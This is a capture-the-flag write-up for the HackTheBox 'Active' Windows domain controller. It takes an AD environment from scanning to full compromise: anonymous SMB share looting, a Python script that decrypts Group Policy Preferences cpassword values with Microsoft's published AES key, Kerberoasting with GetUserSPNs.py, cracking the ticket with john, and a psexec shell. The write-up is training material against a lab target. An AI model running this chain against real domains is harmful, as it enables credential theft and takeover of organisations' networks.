HackTheBox Active Writeup
Dive into the HackTheBox Active Capture The Flag (CTF) challenge, an easy-level journey into Windows Active Directory security. This concise writeup simplifies complex concepts, offering a clear path to understanding and exploiting common AD vulnerabilities.
Add Hosts
Edit the /etc/hosts file and add the following entries:
1
10.10.10.100 active.htb
This ensures that your system can resolve the domain names active.htb to the correct IP address 10.10.10.100.
Script to add hosts automatically
1
2
3
ip="10.10.10.100"
domain="active.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV active.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-12 12:50 CEST
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.055s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-12 10:51:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-12T10:52:02
|_ start_date: 2024-09-12T10:47:26
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Samba Shares
1
smbmap -H active.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections
Access SMB Shares
Automatic Access Using
smbclient:1 2 3 4 5 6 7 8 9 10 11
mkdir -p /tmp cd /tmp if ! command -v samba &>/dev/null; then if command -v pacman &>/dev/null; then sudo pacman -Syu samba else echo "Error: Could not find a suitable package manager to install samba." exit 1 fi fi smbclient //active.htb/Replication -N -c 'prompt; recurse; mget *'
Manual Access to Avoid Excessive Requests:
1
smbclient //active.htb/Replication -I active.htb -N
Files of Interest:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
. └── active.htb ├── DfsrPrivate │ ├── ConflictAndDeleted │ ├── Deleted │ └── Installing ├── Policies │ ├── {31B2F340-016D-11D2-945F-00C04FB984F9} │ │ ├── GPT.INI │ │ ├── Group Policy │ │ │ └── GPE.INI │ │ ├── MACHINE │ │ │ ├── Microsoft │ │ │ │ └── Windows NT │ │ │ │ └── SecEdit │ │ │ ├── Preferences │ │ │ │ └── Groups │ │ │ │ └── Groups.xml <- file with the hashed password │ │ │ └── Registry.pol │ └── {6AC1786C-016F-11D2-945F-00C04fB984F9} │ ├── GPT.INI │ ├── MACHINE │ │ └── Microsoft │ │ └── Windows NT │ │ └── SecEdit │ └── USER └── scripts1 2
cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\ more Groups.xml
Decrypt the Password
GPP Password Decryption
Pre-2012 GPP passwords are AES-256 encrypted but vulnerable due to Microsoft’s published AES private key. Authenticated users can read SYSVOL, find XML files with cpassword, and decrypt them.
- Vulnerability: AES-256 private key published.
- Target: XML in SYSVOL (
cpasswordfield). - Decryption Key: MSDN AES Key.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64
def main():
try:
key = b"\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
iv = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b64_ciphertext = input("Enter the Base64-encoded ciphertext: ").strip()
b64_ciphertext += "=" * (((4 - len(b64_ciphertext) % 4) % 4))
print(f"Base64 ciphertext (with padding): {b64_ciphertext}")
try:
raw_ciphertext = base64.b64decode(b64_ciphertext)
print(f"Raw ciphertext (decoded): {raw_ciphertext}")
except (base64.binascii.Error, ValueError) as e:
print(f"Error decoding Base64: {e}")
return
cipher = AES.new(key, AES.MODE_CBC, iv)
try:
plaintext_padded = cipher.decrypt(raw_ciphertext)
print(f"Plaintext (with padding): {plaintext_padded}")
plaintext = unpad(plaintext_padded, AES.block_size)
print("Decrypted plaintext:", plaintext.decode())
except ValueError as e:
print(f"Decryption error: {e}")
except KeyboardInterrupt:
print("\nProcess interrupted by user. Exiting ...")
if __name__ == "__main__":
main()
Perform Kerberoasting
Get the Ticket:
1 2 3 4
PASWORD="<password>" smbmap -H active.htb -u SVC_TGS -p $PASWORD GetUserSPNs.py -dc-ip active.htb active.htb/SVC_TGS:$PASWORD GetUserSPNs.py -dc-ip active.htb active.htb/SVC_TGS:$PASWORD -request
Crack the Ticket Hash:
1 2 3
echo '<ticket>' > ticket.txt john --format=krb5tgs --wordlist=/usr/share/dict/rockyou.txt ticket.txt rm -rf ticket.txt
Use the Found Admin Password:
1 2 3
PASWORD="<password>" smbmap -H active.htb -u Administrator -p $PASWORD smbclient //MOUNT/Users -I active.htb -U=Administrator%$PASWORD -c "more Administrator\Desktop\root.txt"
Get a Shell
1
psexec.py administrator@active.htb
This post is licensed under CC BY 4.0 by the author.